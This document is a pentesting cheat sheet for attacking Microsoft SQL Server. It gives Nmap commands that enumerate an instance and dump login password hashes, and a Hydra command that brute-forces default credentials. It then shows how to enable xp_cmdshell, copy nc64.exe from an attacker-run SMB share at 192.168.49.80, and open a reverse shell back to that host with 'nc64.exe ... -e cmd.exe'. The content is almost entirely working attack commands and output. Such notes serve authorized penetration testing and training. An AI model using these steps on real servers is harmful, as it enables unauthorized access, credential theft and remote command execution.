MSSQL Services
mssql-vulnerability – Nmap's ms-sql-* NSE scripts can be leveraged to enumerate an MsSQL instance: ms-sql-info reports version and instance details, ms-sql-config reads server configuration, and ms-sql-dump-hashes pulls the login password hashes (the last two need valid credentials, and the hash dump needs a sysadmin login). The reported version is what you then match against known vulnerabilities.
Example Syntax:
nmap -vv -sV -Pn -p [PORT] --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=[PORT],mssql.username=sa,mssql.password=sa [IP]
(The example assumes the login sa/sa; substitute whatever credentials you have. mssql.username and mssql.password are passed to every ms-sql-* script.)
mssql-default – Hydra can be utilized to test the MsSQL login for default credentials: -C takes a user:pass pair file, -u loops over users before passwords, and -f stops at the first valid pair.
Example Syntax:
hydra -s [PORT] -C ./wordlists/mssql-default-userpass.txt -u -f [IP] mssql
Using MSSQL xp_cmdshell to get a reverse shell
xp_cmdshell is disabled by default and enabling it requires a sysadmin (or ALTER SETTINGS) login; it is an advanced option, so 'show advanced options' has to be switched on first. Commands run under the SQL Server service account, not as the SQL login you authenticated with.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
SQL> xp_cmdshell 'whoami'
output
--------------------------------------------------------------------------------
nt service\mssql$sqlexpress
NULL
The single-quoted argument is a string literal regardless of the session's QUOTED_IDENTIFIER setting. The result shows the account the shell will run as (here the per-service virtual account of a SQLEXPRESS instance); the trailing NULL row is normal, xp_cmdshell always ends its result set with one.
Start an SMB share on the attacking host (192.168.49.80 below) that serves the current directory, containing nc64.exe, as a share named tools. Add -smb2support if the target refuses SMB1, which current Windows builds do by default:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support tools .
SQL> xp_cmdshell 'copy \\192.168.49.80\tools\nc64.exe c:\temp'
(c:\temp must already exist on the target; check the copy output for "1 file(s) copied." before going on.) With a listener waiting on port 80 of the attacking host, launch the shell; the query blocks until nc exits:
SQL> xp_cmdshell 'c:\temp\nc64.exe 192.168.49.80 80 -e cmd.exe'